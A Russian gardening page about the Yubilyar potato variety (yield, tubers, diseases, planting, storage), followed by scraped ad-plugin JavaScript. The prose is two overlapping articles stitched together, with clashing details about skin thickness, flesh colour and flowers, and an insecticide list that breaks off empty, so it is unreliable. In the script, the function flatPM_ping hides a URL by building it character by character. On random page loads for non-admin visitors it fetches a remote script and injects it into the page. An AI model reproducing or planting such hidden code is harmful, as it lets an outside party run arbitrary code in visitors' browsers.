10 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Описание картофеля юбиляр

Сорт картофеля Юбиляр

Выбирая сорт для посадки, каждый огородник на первое место ставит такие критерии: урожайность, устойчивость к болезням, простота и легкость в уходе. Всеми этими достоинствами обладает картофель Юбиляр. Рекомендован для выращивания на промышленных полях и в огородах. Растет в разных климатических зонах, непритязателен в уходе.

Подробная общая характеристика

Юбиляр относится к раннеспелым сортам столового назначения. Его урожай можно собирать по 2 раза в год. Хорошо употребляет влагу почвы, особенно в начале лета. Срок созревания – в среднем 70-80 дней. Кожура плотная, толстая, картошка хорошо хранится зимой.

Для еды первое выкапывание можно проводить уже на 45 день после появления первых всходов. Урожайность молодых клубней, выкопанных до 50 дня – 200ц/га. Клубни имеют средние и средне-крупные размеры. Кожура тонкая и непрочная, легко отстает при чистке.

При второй копке урожайность – 220ц/га. Картофель Юбиляр отличается хорошей приспосабливаемостью к разной географии областей и климату. Неприхотлив в выращивании и хорошо развивается в почвах разного типа.

Разрастание ботвы происходит умеренно. Куст промежуточного типа, полупрямостоячий, стеблевой. По размеру высокий. Цветки достаточно крупные, внутренняя сторона венчика окрашена в антоциановый цвет. Синева либо мала, либо отсутствует. Листья по форме типичные для данной культуры. Расположены промежуточно. Без опушения, слабо морщинистые, крупные, цвет – насыщенно-зеленый.

Достоинства

Юбиляр относится к одним из самых распространенных и востребованных сортов среди дачников и опытных фермеров. Его преимущества:

  • урожайность: средняя 170-360 ц/га;
  • максимальный потенциал 400- 410ц/га;
  • товарность 80-96%;
  • лежкость 88-90%;
  • быстрое и эффективное развитие;
  • неприхотливость в уходе;
  • терпимость к перепадам температуры;
  • устойчивость к многим болезням;
  • засухоустойчивость.

Описание клубней

Клубни крупные, ровные, округлой формы. Глазки находятся на средней глубине, имеют розоватый оттенок. Кожица красная. Мякоть светло-кремовая. Богата на витамин С и каротиноиды. Масса клубней приблизительно одинаковая, может меняться в диапазоне от 90 до 200 г. Содержание крахмала выше среднего уровня –14,5-15,8%.

Клубни устойчивы к механическим повреждениям, это позволяет осуществлять любую транспортировку, использовать механизированную уборку урожая. Картошка при варке сильно не рассыпается и не меняет цвет. Вкус клубней отличается насыщенностью. Их широко применяют для приготовления разных блюд:

  • салатов;
  • пюре;
  • картошки-фри;
  • картошки в мундирах и запеченной.

Масса полезных витаминов и минералов сохраняется в клубнях, если варить их в кожуре. Это калий, фосфор, кальций, высокая концентрация витамина С, А, В. Вкусовые качества отличные. Клубни идеальны для продажи. Они подходят для питания в детских учреждениях, заведениях общепита.

Правильно готовим к посадке

Перед высадкой в почву рекомендуется производить проращивание клубней. Это влияет на скорость созревания и начало плодоношения. А также способствует формированию устойчивости к факторам внешней среды. Прогревать перед посадкой совсем необязательно. Можно сразу высаживать в грунт.

Устойчивость к болезням

Юбиляр отличается устойчивостью ко многим болезнетворным патогенам. Он редко болеет такими болезнями как:

  • рак картофеля;
  • золотистая нематода;
  • морщинистая мозаика;
  • цистообразующая нематода.

Устойчивость к фитофторозу можно охарактеризовать, как среднюю. В период эпидемии рекомендовано проводить профилактическое опрыскивание препаратами содержащими медь. Полезно вносить в почву древесную золу. Это поможет избежать черную ножку и гнили.

Для борьбы с колорадским жуком можно применять промышленные инсектициды:

Выбор почвы под Юбиляр

Этот сорт картофеля относится к неприхотливым растениям. Но, как и любой пасленовый, Юбиляр лучше растет и развивается в плодородных и легких грунтах. Как вариант подходят:

  • суглинки легкие и средние;
  • песчаные земли хорошо удобренные.

Землю под картофель готовят с осени. Убирают сорняки, вносят калийные удобрения и органику, и тщательно перекапывают. Весной перекопку проводят еще раз.

Особенности выращивания

За 1-2 недели до посадки посадочный материал выкладывают на свет. Позеленение благоприятно действует на прорастающие клубни и способствует лучшему развитию в дальнейшем. Перед посадкой землю рыхлят, вносят в нее компост, древесную золу. В рыхлой легкой почве клубни вырастают более ровными.

Картофель начинают высаживать в мае, когда температура почвы прогреется до 13 градусов. Лунки делают глубиной 15 см. Расстояние между растениями выдерживают 60-75 см.

Юбиляр отзывчив на подкормки. 1-2раза за сезон осуществляют внесение удобрений. В период вегетации проводят азотную подкормку. Рыхления, окучивания и прополки помогут добиться максимального урожая. Окучивание за все время выращивания проводят не менее 2 раза, совмещая процесс с прополкой и удалением сорняков.

Как хранить?

Выкопанную картошку просушивают на участке или под навесом. Место для хранения выбирают сухое, темное. Сорт характеризуется высокой лежкостью и хорошо хранится на протяжении всей зимы. Лучшая температура для исключения прорастания 4 градуса.

Описание картофеля Юбиляр

Каждый огородник отталкивается от определенных критерий во время выбора сорта для посадки. В первую очередь, учитывается урожайность, срок созревания и возможные заболевания. Можно точно сказать, что под все критерии подходит картофель Юбиляр. Его часто советуют опытные овощеводы для культивирования на промышленных полях и для домашнего использования. Картофель Юбиляр развивается в любой почве и не требователен в уходе.

Описание картофеля Юбиляр

Характеристика

Сорт Юбиляр был зарегистрирован в Западно-Сибирском регионе. Картофель раннеспелый, столовый. Стал популярен в первые в Сибири и на Дальнем Востоке. Длительность созревания 70-80 дней.

Ранний картофель собирают через 45 дней после высадки в грунт. Корневая система очень развита. Под одним кустом может формироваться 10-16 плодов. Урожайность сорта в пределах 167-360 ц/га.

Описание растения

Растение имеет следующее описание:

  • Ботва сильно не разрастается.
  • Куст прямой, стеблевой, достаточно высокий.
  • Венчики больших размеров, голубого оттенка.
  • Листья немного удлинение, крупные, волокнистые, зеленого цвета.
  • Корневая система достаточно развита.

Описание корнеплода

Один плод имеет массу 94-210 г. Описание картофеля – цвет шкуры красный, а мякоть желтая. Есть глазки средних размеров, розового цвета. Сами клубни больших размеров, круглой формы.

В плодах есть крахмал 14,5-15,8%, поэтому картофель не разваривается, получается красивым и аккуратным. Картошка богата на витамин С и каротиноиды. Лежкость не большая, в пределах 88%.

Картофель обладает прекрасным вкусом. Мякоть не имеет способности темнеть во время приготовления. Картошку можно жарить, тушить, варить и запекать. Витамины продукт сохраняет, если сварить или запечь картошку в кожуре.

Достоинства и недостатки

В основном, сорт имеет положительную характеристику. Огородники выделяют такие качества:

  • хорошая урожайность;
  • лежкость в пределах нормы;
  • товарный вид в пределах 80-96%;
  • возможность перевозить овощи без повреждений;
  • крахмал на среднем уровне;
  • стойкость ко многим заболеваниям;
  • нормальная переносимость резких перепадов температуры;
  • сбор урожая можно проводить любым способом, на его качество это не повлияет;
  • неприхотлив в уходе, содержит множество витаминов;
  • недостатков не имеет.

Правила посадки

Клубни нужно подготовить к посадке

Каждый огородник должен знать основные правила посадки картофеля. Перед высадкой картошки в грунт его обязательно подготавливают, так как от этого зависит скорость созревания и появления плодоношения.

Также проращивание сильно влияет на формирование и крепость к резким переменам погодных условий. Прогревать посадочный материал не обязательно, его можно сразу сажать на участок.

Подготовка клубней и почвы

Сорт неприхотлив в уходе. Но, как и любой другой вид картошки, Юбиляр хорошо себя чувствует в легких и плодоносных почвах. Для этого вида подходит суглинистая почва и песчаная, но хорошо удобренная. Землю начинают подготовлять с осени. Ее чистят от ненужной ботвы и сорняков, добавляют калийные удобрения и органику, а затем хорошо перекапывают. Весной следует провести перекопку еще раз.

За 2 недели до начала посадки подготавливают плоды. Их выносят с погреба в светлое место. Перед самой посадкой в землю добавляют древесную золу, компост и рыхлят. Именно в рыхлом грунте плоды вырастут ровными и аккуратными.

Высадка в грунт

Посадку Юбиляра начинают в мае, чтобы температура воздуха и почвы полностью прогрелась. Температура должна быть в пределах 13°С.

Ямки выкапывают глубиной 15 см, делают расстояние между лунками в приделах 60-75 см.

Как правильно ухаживать за растением

Сорт любит удобрения и подкормки. Несколько раз за весь вегетационный период вносят удобрения. Также необходимо провести азотную подкормку. Стоит не забывать про своевременное рыхление, прополки, поливы и очистку сорняков, ведь от этого зависит количество урожая.

Окучивание за весь период делают 2 раза, эту процедуру необходимо выполнять одновременно с уборкой сорняков и прополкой.

Заболевания и вредители

Картошка этого вида достаточно устойчива ко многим заболеваниям. Она практически не болеет картофельным раком, золотистой нематодой и морщинистой мозаикой. Прекрасно переносит фитофтороз, но в момент эпидемии стоит провести профилактические мероприятия. Для этого опрыскивают растение специальными препаратами, которые содержат медь.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};